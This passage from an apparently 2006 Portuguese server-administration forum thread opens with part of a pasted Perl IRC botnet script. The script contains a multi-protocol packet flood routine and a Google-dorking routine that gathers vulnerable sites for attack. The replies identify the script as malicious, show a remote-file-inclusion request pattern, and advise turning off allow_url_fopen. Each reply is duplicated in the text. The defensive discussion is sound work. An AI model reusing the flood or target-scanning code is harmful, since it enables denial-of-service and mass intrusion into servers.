$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(920)));
if ($rnd>900) { $s= (int(rand(100)))}
{
my @dominios = ("com","net","org","info","gov","gob","gub","xxx","it","uk","wx","eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec","py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop","af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi","vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk","ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir","iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke","ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm","na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc","sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz","vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"site%3A".$dom."+@gstring");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
#sendraw("privmsg #alef :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
# NOTE: DONT REMOVE COPYRIGHTS
#6
Posted 07 novembro 2006 - 11:46
com certeza é um script malicioso.
onde você o encontrou? na conta de um usuário ou no /tmp ?
se tiver no /tmp provavelmente ele foi enviado através de algum script vulnerável, pegue phpbb, coopermine, drupal, joomla entre outros que podem estar em seu servidor com versão desatualizada que pode ser uma porta aberta para este tipo de ação.
Nesta caso experimente dar um grep no error_log do apache, pois para conseguir acesso provavelmente ele errou em algum momento.
Vá em
cd /usr/local/apache/conf
e digite
grep txt error_log
procure algo como
"GET /algumarquivo.php?p=http://www.sitediferente.com/algumarquivo.txt?
alguma coisa diferente, ok?
Com isto você vai conseguir descobrir qual script de qual site está vulnerável e permitindo tal invasão.
onde você o encontrou? na conta de um usuário ou no /tmp ?
se tiver no /tmp provavelmente ele foi enviado através de algum script vulnerável, pegue phpbb, coopermine, drupal, joomla entre outros que podem estar em seu servidor com versão desatualizada que pode ser uma porta aberta para este tipo de ação.
Nesta caso experimente dar um grep no error_log do apache, pois para conseguir acesso provavelmente ele errou em algum momento.
Vá em
cd /usr/local/apache/conf
e digite
grep txt error_log
procure algo como
"GET /algumarquivo.php?p=http://www.sitediferente.com/algumarquivo.txt?
alguma coisa diferente, ok?
Com isto você vai conseguir descobrir qual script de qual site está vulnerável e permitindo tal invasão.
#7
Posted 07 novembro 2006 - 02:01
aproveitando o topico , tem sites de clientes sofrendo ataque php injection, dessa maneira
GET /algumarquivo.php?p=http://www.sitediferente.com/algumarquivo.txt
tem alguma forma de impedir com o mod_security por ex. ou so mudando o codigo?
GET /algumarquivo.php?p=http://www.sitediferente.com/algumarquivo.txt
tem alguma forma de impedir com o mod_security por ex. ou so mudando o codigo?
#8
Posted 07 novembro 2006 - 03:36
Olha, o mod_security ajuda porém quanto mais regras você adicionar mais falsos positivos poderá ser gerado. Não é raro eu adicionar uma nova regra e logo depois algum cliente reclamar que determinado sistema está dando "Forbidden" por causa do mod_security.
Claro, o ideal seria que o código estivesse seguro mas infelizmente muitos mesmos não estão. Tipo, ficar correndo atrás de cliente com código inseguro, pedir para ele alterar é um saco. Tanto para o suporte quanto para o cliente. As vezes é inevitável mas independente do sistema do cliente temos que criar maneiras de deixar o servidor mais seguro.
Há uma opção que você pode desabilitar no php e eu posso te garantir que pelo menos 99% de invasões por vulnerabilidades dos includes deixarão de ocorrer.
Altere a variável do php de
allow_url_fopen = On
para
allow_url_fopen = Off
Isto fará com que o comando include não execute arquivos externos e irá impedir este tipo de invasão.
Agora, muita calma nesta hora. Provavelmente algum de seus clientes utilizam este recurso de maneira correta, seja um rss ou alguma comunicação com servidor externo. Neste caso você vai ter que habilitar esta função somente para o cliente, e a única maneira de você fazer isto é editando o httpd.conf e inserindo no virtualhost do usuário:
php_admin_value allow_url_fopen 1
Isto fará com que somente aquele usuário tenha esta opção disponível e deste usuário você terá que exigir que seu código esteja seguro.
É trabalhoso? um pouco, mas se de 500 contas apenas 5 tiverem esta opção habilitada você já estará reduzindo drasticamente o risco de invasão. E é muito mais fácil você exigir que 5 clientes mantenham o código seguro do que 500. E caso o cliente não faça a correção na vulnerabilidade de seu código basta desabilitar a função fopen até o usuário fazer a correção.
Olha, era muito, mas muito comum em TODOS os meus servidores spammers utilizarem deste tipo de vulnerabilidade para realizar spam. Depois que eu desabilitei esta opção o número de spam reduziu muuuuito, mas muito mesmo.
Claro, o ideal seria que o código estivesse seguro mas infelizmente muitos mesmos não estão. Tipo, ficar correndo atrás de cliente com código inseguro, pedir para ele alterar é um saco. Tanto para o suporte quanto para o cliente. As vezes é inevitável mas independente do sistema do cliente temos que criar maneiras de deixar o servidor mais seguro.
Há uma opção que você pode desabilitar no php e eu posso te garantir que pelo menos 99% de invasões por vulnerabilidades dos includes deixarão de ocorrer.
Altere a variável do php de
allow_url_fopen = On
para
allow_url_fopen = Off
Isto fará com que o comando include não execute arquivos externos e irá impedir este tipo de invasão.
Agora, muita calma nesta hora. Provavelmente algum de seus clientes utilizam este recurso de maneira correta, seja um rss ou alguma comunicação com servidor externo. Neste caso você vai ter que habilitar esta função somente para o cliente, e a única maneira de você fazer isto é editando o httpd.conf e inserindo no virtualhost do usuário:
php_admin_value allow_url_fopen 1
Isto fará com que somente aquele usuário tenha esta opção disponível e deste usuário você terá que exigir que seu código esteja seguro.
É trabalhoso? um pouco, mas se de 500 contas apenas 5 tiverem esta opção habilitada você já estará reduzindo drasticamente o risco de invasão. E é muito mais fácil você exigir que 5 clientes mantenham o código seguro do que 500. E caso o cliente não faça a correção na vulnerabilidade de seu código basta desabilitar a função fopen até o usuário fazer a correção.
Olha, era muito, mas muito comum em TODOS os meus servidores spammers utilizarem deste tipo de vulnerabilidade para realizar spam. Depois que eu desabilitei esta opção o número de spam reduziu muuuuito, mas muito mesmo.
Share this topic:
Page 1 of 1

Help










